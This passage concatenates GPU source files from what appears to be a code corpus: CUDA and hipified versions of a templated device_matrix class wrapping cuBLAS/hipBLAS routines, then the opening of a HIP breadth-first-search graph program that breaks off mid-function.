"%f" : "%lf"; T* data = new T[_rows*_cols]; for (size_t i=0; i<_rows; ++i) for (size_t j=0; j<_cols; ++j) { fscanf(fid, rspecifier, &(data[j*_rows + i])); } fclose(fid); _init(); CCE(hipMemcpy(_data, data, sizeof(T) * _rows * _cols, hipMemcpyHostToDevice)); delete [] data; } // Copy Constructor template <typename T> device_matrix<T>::device_matrix(const device_matrix<T>& source): _rows(source._rows), _cols(source._cols), _capacity(_rows * _cols), _data(NULL) { _init(); CCE(hipMemcpy(_data, source._data, sizeof(T) * _rows * _cols, hipMemcpyDeviceToDevice)); } template <typename T> device_matrix<T>::device_matrix(const Transposed& source): _rows(source._m._cols), _cols(source._m._rows), _capacity(_rows * _cols), _data(NULL) { _init(); dim3 grid; grid.x = (unsigned int) ceil((float) _cols / 32); grid.y = (unsigned int) ceil((float) _rows / 32); dim3 threads(32, 32); hipLaunchKernelGGL(( naiveMatrixTranspose), dim3(grid), dim3(threads), 0, 0, _data, source._m._data, _rows, _cols); } #ifdef HAVE_THRUST_DEVICE_VECTOR_H // Conversion operator template <typename T> device_matrix<T>::operator thrust::device_vector<T>() const { assert(_rows == 1 || _cols == 1); return thrust::device_vector<T>(_data, _data + size()); } #endif template <typename T> device_matrix<T>::~device_matrix() { CudaMemManager<T>::free(_data); } // =========================== // ===== Other Functions ===== // =========================== // ===== Addition ===== template <typename T> device_matrix<T>& device_matrix<T>::operator += (T val) { cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (T val) const { device_matrix<T> m(*this); return (m += val); } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::plus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); thrust::device_ptr<T> ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::plus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const typename device_matrix<T>::Transposed& rhs) { *this = *this + rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) 1.0, false, true); return result; } // ===== Substraction ===== template <typename T> device_matrix<T>& device_matrix<T>::operator -= (T val) { val = -val; cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (T val) const { device_matrix<T> m(*this); return (m -= val); } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::minus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); 
thrust::device_ptr<T> ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::minus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const typename device_matrix<T>::Transposed& rhs) { *this = *this - rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) -1.0, false, true); return result; } // ===== Division ===== template <typename T> device_matrix<T>& device_matrix<T>::operator /= (T alpha) { return *this *= ( (T) 1 / alpha ); } template <typename T> device_matrix<T> device_matrix<T>::operator / (T alpha) const { return *this * ( (T) 1 / alpha ); } // ===== Matrix-scalar Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (T alpha) { if (alpha != 1) { cublas_scal(_rows*_cols, alpha, _data, 1); } return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (T alpha) const { device_matrix<T> result(*this); return result *= alpha; } // ===== Matrix-Matrix Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const device_matrix<T>& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, rhs._cols, 0); gemm(*this, rhs, result, (T) 1.0, (T) 0.0); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const Transposed& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const Transposed& rhs) const { device_matrix<T> result(_rows, rhs._m._rows, 0); gemm(*this, rhs._m, result, (T) 1.0, (T) 0.0, false, true); return result; } // Operator Assignment: // call copy constructor first, and swap with the temp variable template <typename T> device_matrix<T>& device_matrix<T>::operator = (device_matrix<T> rhs) { swap(*this, rhs); return *this; } // Operator transpose template <typename T> device_matrix<T>::Transposed device_matrix<T>::operator ~ () const { return device_matrix<T>::Transposed(*this); } template <typename T> void device_matrix<T>::_init() { _capacity = _rows * _cols; _data = CudaMemManager<T>::malloc(_rows * _cols); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c) { // printf("trying to resize from (%lu, %lu) => (%lu, %lu), with original capacity = %lu\n", _rows, _cols, r, c, _capacity); if (_rows == r && _cols == c) { return; } _rows = r; _cols = c; if (r * c <= _capacity) { return; } CudaMemManager<T>::free(_data); _init(); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c, T value) { this->resize(r, c); fillwith(value); } template <typename T> void device_matrix<T>::reserve(size_t capacity) { if (capacity <= _capacity) { return; } _capacity = capacity; T* buffer = CudaMemManager<T>::malloc(_capacity); CCE(hipMemcpy(buffer, _data, sizeof(T) * size(), hipMemcpyDeviceToDevice)); CudaMemManager<T>::free(_data); _data = buffer; } template <typename T> void device_matrix<T>::print(FILE* fid, int precision, char delimiter) const { if (_rows == 0 || _cols == 0) { return; } T* data = new T[size()]; CCE(hipMemcpy(data, _data, sizeof(T) * size(), hipMemcpyDeviceToHost)); char format[16]; sprintf(format, "%c%%.%de", 
delimiter, precision < 0 ? 0 : precision); for (size_t i=0; i<_rows; ++i) { fprintf(fid, format, data[i]); for (size_t j=1; j<_cols; ++j) { fprintf(fid, format, data[j*_rows + i]); } fprintf(fid, "\n"); } delete [] data; } template <typename T> void device_matrix<T>::fillwith(T val) { hipMemset(_data, 0, _rows * _cols * sizeof(T)); if (val != 0) { *this += val; } } template <typename T> void device_matrix<T>::save(const std::string& filename) const { FILE* fid = fopen(filename.c_str(), "w"); if (fid == NULL) { return; } print(fid); fclose(fid); } template <> void device_matrix<float>::cublas_gemm( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, int k, float alpha, const float* A, int lda, const float* B, int ldb, float beta, float* C, int ldc) { CCE(hipblasSgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<double>::cublas_gemm( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, int k, double alpha, const double* A, int lda, const double* B, int ldb, double beta, double* C, int ldc) { CCE(hipblasDgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<float>::cublas_geam( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, float alpha, const float *A, int lda, float beta , const float *B, int ldb, float *C, int ldc) { CCE(hipblasSgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<double>::cublas_geam( hipblasOperation_t transA, hipblasOperation_t transB, int m, int n, double alpha, const double *A, int lda, double beta , const double *B, int ldb, double *C, int ldc) { CCE(hipblasDgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<float>::cublas_gemv( hipblasOperation_t trans, int m, int n, float alpha, const float *A, int lda, const float *x, int incx, float beta, float *y, int incy) { CCE(hipblasSgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<double>::cublas_gemv( hipblasOperation_t trans, int m, int n, double alpha, const double *A, int lda, const double *x, int incx, double beta, double *y, int incy) { CCE(hipblasDgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<float>::cublas_iamax(int n, const float *x, int incx, int *result) { CCE(hipblasIsamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_iamax(int n, const double *x, int incx, int *result) { CCE(hipblasIdamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_nrm2(int n, const float *x, int incx, float *result) { CCE(hipblasSnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_nrm2(int n, const double *x, int incx, double *result) { CCE(hipblasDnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_scal(int n, float alpha, float *x, int incx) { CCE(hipblasSscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void device_matrix<double>::cublas_scal(int n, double alpha, double *x, int incx) { CCE(hipblasDscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void 
device_matrix<float>::cublas_axpy( int n, float alpha, const float *x, int incx, float *y, int incy) { CCE(hipblasSaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } template <> void device_matrix<double>::cublas_axpy( int n, double alpha, const double *x, int incx, double *y, int incy) { CCE(hipblasDaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } // ++++++++++++++++++++++++++++++++++++++++++++ // +++++ Template Explicit Initialization +++++ // ++++++++++++++++++++++++++++++++++++++++++++ template class device_matrix<float>; template class device_matrix<double>;
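Both versions of device_matrix keep their data in the column-major layout that cuBLAS/hipBLAS expect, which is why the file-reading constructor writes element (i, j) to data[j*_rows + i]. The standalone sketch below shows only that repacking convention on a made-up 2x3 matrix; it is an illustration of the indexing, not code from the library.

// column_major_sketch.cpp -- illustrative only; not part of device_matrix.
#include <cstdio>

int main() {
    const int rows = 2, cols = 3;
    // Row-major view of the matrix [[1,2,3],[4,5,6]] (assumed example data).
    double rowMajor[rows * cols] = {1, 2, 3, 4, 5, 6};
    double colMajor[rows * cols];

    // Repack into the BLAS column-major layout used by the constructor:
    // element (i, j) lives at index j*rows + i.
    for (int i = 0; i < rows; ++i)
        for (int j = 0; j < cols; ++j)
            colMajor[j * rows + i] = rowMajor[i * cols + j];

    for (int k = 0; k < rows * cols; ++k) printf("%g ", colMajor[k]);
    printf("\n");  // prints: 1 4 2 5 3 6
    return 0;
}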
04df184b087f062b49c6a072109247331418ccbf.cu
#include <device_matrix.h> #include <thrust/transform_reduce.h> #include <thrust/functional.h> #include <thrust/host_vector.h> #include <thrust/device_vector.h> #define mylog(token) {std::cout << #token " = " << token << std::endl;} template <typename T> cudaStream_t device_matrix<T>::_cuda_stream = 0; template <typename T> void device_matrix<T>::setCudaStream(cudaStream_t& streamId) { cublasSetStream(CUBLAS_HANDLE::getInstance(), streamId); _cuda_stream = streamId; } // =============================== // ===== class device_matrix ===== // =============================== template <typename T> __global__ void naiveMatrixTranspose(T *odata, const T *idata, const int rows, const int cols) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < cols && y < rows) { odata[x*rows + y] = idata[y*cols+ x]; } } template <typename T> device_matrix<T>::device_matrix(): _rows(0), _cols(0), _capacity(_rows * _cols), _data(NULL) { } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); // Be careful to comment the following line. // If the user think the default value are 0, it may give rise to creepy NaN. // fillwith(0); } template <typename T> device_matrix<T>::device_matrix(size_t r, size_t c, T value): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); fillwith(value); } template <typename T> device_matrix<T>::device_matrix(T* h_data, size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); CCE(cudaMemcpy(_data, h_data, sizeof(T) * _rows * _cols, cudaMemcpyHostToDevice)); } template <typename T> device_matrix<T>::device_matrix(const std::string& filename): _rows(0), _cols(0), _capacity(_rows*_cols), _data(NULL) { const size_t MAX_BUFFER = 262144; char line[MAX_BUFFER]; FILE* fid = fopen(filename.c_str(), "r"); while (fgets(line, MAX_BUFFER, fid)) { _rows++; assert(line[strlen(line) - 1] == '\n'); if (_cols != 0) { continue; } char* token = strtok(line, " \n"); ++_cols; while(strtok(NULL, " \n")) { ++_cols; } } fseek(fid, 0, SEEK_SET); // BEWARE !! // BLAS stores data in column-major const char *rspecifier = (sizeof(T) / sizeof(float) == 1) ? 
"%f" : "%lf"; T* data = new T[_rows*_cols]; for (size_t i=0; i<_rows; ++i) for (size_t j=0; j<_cols; ++j) { fscanf(fid, rspecifier, &(data[j*_rows + i])); } fclose(fid); _init(); CCE(cudaMemcpy(_data, data, sizeof(T) * _rows * _cols, cudaMemcpyHostToDevice)); delete [] data; } // Copy Constructor template <typename T> device_matrix<T>::device_matrix(const device_matrix<T>& source): _rows(source._rows), _cols(source._cols), _capacity(_rows * _cols), _data(NULL) { _init(); CCE(cudaMemcpy(_data, source._data, sizeof(T) * _rows * _cols, cudaMemcpyDeviceToDevice)); } template <typename T> device_matrix<T>::device_matrix(const Transposed& source): _rows(source._m._cols), _cols(source._m._rows), _capacity(_rows * _cols), _data(NULL) { _init(); dim3 grid; grid.x = (unsigned int) ceil((float) _cols / 32); grid.y = (unsigned int) ceil((float) _rows / 32); dim3 threads(32, 32); naiveMatrixTranspose<<<grid, threads>>>(_data, source._m._data, _rows, _cols); } #ifdef HAVE_THRUST_DEVICE_VECTOR_H // Conversion operator template <typename T> device_matrix<T>::operator thrust::device_vector<T>() const { assert(_rows == 1 || _cols == 1); return thrust::device_vector<T>(_data, _data + size()); } #endif template <typename T> device_matrix<T>::~device_matrix() { CudaMemManager<T>::free(_data); } // =========================== // ===== Other Functions ===== // =========================== // ===== Addition ===== template <typename T> device_matrix<T>& device_matrix<T>::operator += (T val) { cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (T val) const { device_matrix<T> m(*this); return (m += val); } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::plus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); thrust::device_ptr<T> ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::plus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const typename device_matrix<T>::Transposed& rhs) { *this = *this + rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) 1.0, false, true); return result; } // ===== Substraction ===== template <typename T> device_matrix<T>& device_matrix<T>::operator -= (T val) { val = -val; cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (T val) const { device_matrix<T> m(*this); return (m -= val); } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::minus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); thrust::device_ptr<T> 
ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::minus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const typename device_matrix<T>::Transposed& rhs) { *this = *this - rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) -1.0, false, true); return result; } // ===== Division ===== template <typename T> device_matrix<T>& device_matrix<T>::operator /= (T alpha) { return *this *= ( (T) 1 / alpha ); } template <typename T> device_matrix<T> device_matrix<T>::operator / (T alpha) const { return *this * ( (T) 1 / alpha ); } // ===== Matrix-scalar Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (T alpha) { if (alpha != 1) { cublas_scal(_rows*_cols, alpha, _data, 1); } return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (T alpha) const { device_matrix<T> result(*this); return result *= alpha; } // ===== Matrix-Matrix Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const device_matrix<T>& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, rhs._cols, 0); gemm(*this, rhs, result, (T) 1.0, (T) 0.0); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const Transposed& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const Transposed& rhs) const { device_matrix<T> result(_rows, rhs._m._rows, 0); gemm(*this, rhs._m, result, (T) 1.0, (T) 0.0, false, true); return result; } // Operator Assignment: // call copy constructor first, and swap with the temp variable template <typename T> device_matrix<T>& device_matrix<T>::operator = (device_matrix<T> rhs) { swap(*this, rhs); return *this; } // Operator transpose template <typename T> device_matrix<T>::Transposed device_matrix<T>::operator ~ () const { return device_matrix<T>::Transposed(*this); } template <typename T> void device_matrix<T>::_init() { _capacity = _rows * _cols; _data = CudaMemManager<T>::malloc(_rows * _cols); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c) { // printf("trying to resize from (%lu, %lu) => (%lu, %lu), with original capacity = %lu\n", _rows, _cols, r, c, _capacity); if (_rows == r && _cols == c) { return; } _rows = r; _cols = c; if (r * c <= _capacity) { return; } CudaMemManager<T>::free(_data); _init(); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c, T value) { this->resize(r, c); fillwith(value); } template <typename T> void device_matrix<T>::reserve(size_t capacity) { if (capacity <= _capacity) { return; } _capacity = capacity; T* buffer = CudaMemManager<T>::malloc(_capacity); CCE(cudaMemcpy(buffer, _data, sizeof(T) * size(), cudaMemcpyDeviceToDevice)); CudaMemManager<T>::free(_data); _data = buffer; } template <typename T> void device_matrix<T>::print(FILE* fid, int precision, char delimiter) const { if (_rows == 0 || _cols == 0) { return; } T* data = new T[size()]; CCE(cudaMemcpy(data, _data, sizeof(T) * size(), cudaMemcpyDeviceToHost)); char format[16]; sprintf(format, "%c%%.%de", delimiter, 
precision < 0 ? 0 : precision); for (size_t i=0; i<_rows; ++i) { fprintf(fid, format, data[i]); for (size_t j=1; j<_cols; ++j) { fprintf(fid, format, data[j*_rows + i]); } fprintf(fid, "\n"); } delete [] data; } template <typename T> void device_matrix<T>::fillwith(T val) { cudaMemset(_data, 0, _rows * _cols * sizeof(T)); if (val != 0) { *this += val; } } template <typename T> void device_matrix<T>::save(const std::string& filename) const { FILE* fid = fopen(filename.c_str(), "w"); if (fid == NULL) { return; } print(fid); fclose(fid); } template <> void device_matrix<float>::cublas_gemm( cublasOperation_t transA, cublasOperation_t transB, int m, int n, int k, float alpha, const float* A, int lda, const float* B, int ldb, float beta, float* C, int ldc) { CCE(cublasSgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<double>::cublas_gemm( cublasOperation_t transA, cublasOperation_t transB, int m, int n, int k, double alpha, const double* A, int lda, const double* B, int ldb, double beta, double* C, int ldc) { CCE(cublasDgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<float>::cublas_geam( cublasOperation_t transA, cublasOperation_t transB, int m, int n, float alpha, const float *A, int lda, float beta , const float *B, int ldb, float *C, int ldc) { CCE(cublasSgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<double>::cublas_geam( cublasOperation_t transA, cublasOperation_t transB, int m, int n, double alpha, const double *A, int lda, double beta , const double *B, int ldb, double *C, int ldc) { CCE(cublasDgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<float>::cublas_gemv( cublasOperation_t trans, int m, int n, float alpha, const float *A, int lda, const float *x, int incx, float beta, float *y, int incy) { CCE(cublasSgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<double>::cublas_gemv( cublasOperation_t trans, int m, int n, double alpha, const double *A, int lda, const double *x, int incx, double beta, double *y, int incy) { CCE(cublasDgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<float>::cublas_iamax(int n, const float *x, int incx, int *result) { CCE(cublasIsamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_iamax(int n, const double *x, int incx, int *result) { CCE(cublasIdamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_nrm2(int n, const float *x, int incx, float *result) { CCE(cublasSnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_nrm2(int n, const double *x, int incx, double *result) { CCE(cublasDnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_scal(int n, float alpha, float *x, int incx) { CCE(cublasSscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void device_matrix<double>::cublas_scal(int n, double alpha, double *x, int incx) { CCE(cublasDscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void device_matrix<float>::cublas_axpy( int n, float 
alpha, const float *x, int incx, float *y, int incy) { CCE(cublasSaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } template <> void device_matrix<double>::cublas_axpy( int n, double alpha, const double *x, int incx, double *y, int incy) { CCE(cublasDaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } // ++++++++++++++++++++++++++++++++++++++++++++ // +++++ Template Explicit Initialization +++++ // ++++++++++++++++++++++++++++++++++++++++++++ template class device_matrix<float>; template class device_matrix<double>;
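The copy-from-Transposed constructor above launches naiveMatrixTranspose over a grid of 32x32 thread blocks sized by ceil(cols/32) x ceil(rows/32). The self-contained CUDA sketch below uses the same kernel body and launch geometry, but on a small row-major matrix for readability; the host scaffolding, matrix contents and the row-major convention are assumptions for illustration and differ from device_matrix, which is column-major.

// transpose_sketch.cu -- standalone illustration of the naive transpose pattern; not from device_matrix.
#include <cstdio>
#include <cuda_runtime.h>

__global__ void transposeNaive(float* out, const float* in, int rows, int cols) {
    int x = blockIdx.x * blockDim.x + threadIdx.x;   // column index of the input
    int y = blockIdx.y * blockDim.y + threadIdx.y;   // row index of the input
    if (x < cols && y < rows) out[x * rows + y] = in[y * cols + x];
}

int main() {
    const int rows = 3, cols = 5;                    // dimensions of the row-major input
    float h_in[rows * cols], h_out[rows * cols];
    for (int i = 0; i < rows * cols; ++i) h_in[i] = (float) i;

    float *d_in, *d_out;
    cudaMalloc((void**) &d_in,  sizeof(h_in));
    cudaMalloc((void**) &d_out, sizeof(h_out));
    cudaMemcpy(d_in, h_in, sizeof(h_in), cudaMemcpyHostToDevice);

    // Same launch geometry as the constructor: one 32x32 block per 32x32 tile.
    dim3 threads(32, 32);
    dim3 grid((cols + 31) / 32, (rows + 31) / 32);
    transposeNaive<<<grid, threads>>>(d_out, d_in, rows, cols);
    cudaMemcpy(h_out, d_out, sizeof(h_out), cudaMemcpyDeviceToHost);

    // h_out is the cols x rows transpose, stored row-major.
    for (int j = 0; j < cols; ++j) {
        for (int i = 0; i < rows; ++i) printf("%5.0f", h_out[j * rows + i]);
        printf("\n");
    }
    cudaFree(d_in);
    cudaFree(d_out);
    return 0;
}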
819f92405be37a2e7cb4a36b3065e009e44af990.hip
// !!! This is a file automatically generated by hipify!!! /*********************************************************************************** Implementing Breadth first search on CUDA using algorithm given in HiPC'07 paper "Accelerating Large Graph Algorithms on the GPU using CUDA" Copyright (c) 2008 International Institute of Information Technology - Hyderabad. All rights reserved. Permission to use, copy, modify and distribute this software and its documentation for educational purpose is hereby granted without fee, provided that the above copyright notice and this permission notice appear in all copies of this software and that you do not sell the software. THE SOFTWARE IS PROVIDED "AS IS" AND WITHOUT WARRANTY OF ANY KIND,EXPRESS, IMPLIED OR OTHERWISE. Created by Pawan Harish. ************************************************************************************/ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <math.h> #include <hip/hip_runtime.h> #define MAX_THREADS_PER_BLOCK 512 int no_of_nodes; int edge_list_size; FILE *fp; //Structure to hold a node information struct Node { int starting; int no_of_edges; }; #include <kernel.cu> #include <kernel2.cu> void BFSGraph(int argc, char** argv); //////////////////////////////////////////////////////////////////////////////// // Main Program //////////////////////////////////////////////////////////////////////////////// int main( int argc, char** argv) { no_of_nodes=0; edge_list_size=0; BFSGraph( argc, argv); } void Usage(int argc, char**argv) { fprintf(stderr,"Usage: %s <input_file>\n", argv[0]); } //////////////////////////////////////////////////////////////////////////////// //Apply BFS on a Graph using CUDA //////////////////////////////////////////////////////////////////////////////// void BFSGraph( int argc, char** argv) { char *input_f; if(argc!=2) { Usage(argc, argv); exit(0); } input_f = argv[1]; printf("Reading File\n"); //Read in Graph from a file fp = fopen(input_f,"r"); if(!fp) { printf("Error Reading graph file\n"); return; } int source = 0; fscanf(fp,"%d",&no_of_nodes); int num_of_blocks = 1; int num_of_threads_per_block = no_of_nodes; //Make execution Parameters according to the number of nodes //Distribute threads across multiple Blocks if necessary if(no_of_nodes>MAX_THREADS_PER_BLOCK) { num_of_blocks = (int)ceil(no_of_nodes/(double)MAX_THREADS_PER_BLOCK); num_of_threads_per_block = MAX_THREADS_PER_BLOCK; } // allocate host memory Node* h_graph_nodes = (Node*) malloc(sizeof(Node)*no_of_nodes); bool *h_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_updating_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_graph_visited = (bool*) malloc(sizeof(bool)*no_of_nodes); int start, edgeno; // initalize the memory for( unsigned int i = 0; i < no_of_nodes; i++) { fscanf(fp,"%d %d",&start,&edgeno); h_graph_nodes[i].starting = start; h_graph_nodes[i].no_of_edges = edgeno; h_graph_mask[i]=false; h_updating_graph_mask[i]=false; h_graph_visited[i]=false; } //read the source node from the file fscanf(fp,"%d",&source); source=0; //set the source node as true in the mask h_graph_mask[source]=true; h_graph_visited[source]=true; fscanf(fp,"%d",&edge_list_size); int id,cost; int* h_graph_edges = (int*) malloc(sizeof(int)*edge_list_size); for(int i=0; i < edge_list_size ; i++) { fscanf(fp,"%d",&id); fscanf(fp,"%d",&cost); h_graph_edges[i] = id; } if(fp) { fclose(fp); } printf("Read File\n"); //Copy the Node list to device memory Node* d_graph_nodes; hipMalloc( (void**) &d_graph_nodes, 
sizeof(Node)*no_of_nodes) ; hipMemcpy( d_graph_nodes, h_graph_nodes, sizeof(Node)*no_of_nodes, hipMemcpyHostToDevice) ; //Copy the Edge List to device Memory int* d_graph_edges; hipMalloc( (void**) &d_graph_edges, sizeof(int)*edge_list_size) ; hipMemcpy( d_graph_edges, h_graph_edges, sizeof(int)*edge_list_size, hipMemcpyHostToDevice) ; //Copy the Mask to device memory bool* d_graph_mask; hipMalloc( (void**) &d_graph_mask, sizeof(bool)*no_of_nodes) ; hipMemcpy( d_graph_mask, h_graph_mask, sizeof(bool)*no_of_nodes, hipMemcpyHostToDevice) ; bool* d_updating_graph_mask; hipMalloc( (void**) &d_updating_graph_mask, sizeof(bool)*no_of_nodes) ; hipMemcpy( d_updating_graph_mask, h_updating_graph_mask, sizeof(bool)*no_of_nodes, hipMemcpyHostToDevice) ; //Copy the Visited nodes array to device memory bool* d_graph_visited; hipMalloc( (void**) &d_graph_visited, sizeof(bool)*no_of_nodes) ; hipMemcpy( d_graph_visited, h_graph_visited, sizeof(bool)*no_of_nodes, hipMemcpyHostToDevice) ; // allocate mem for the result on host side int* h_cost = (int*) malloc( sizeof(int)*no_of_nodes); for(int i=0;i<no_of_nodes;i++) { h_cost[i]=-1; } h_cost[source]=0; // 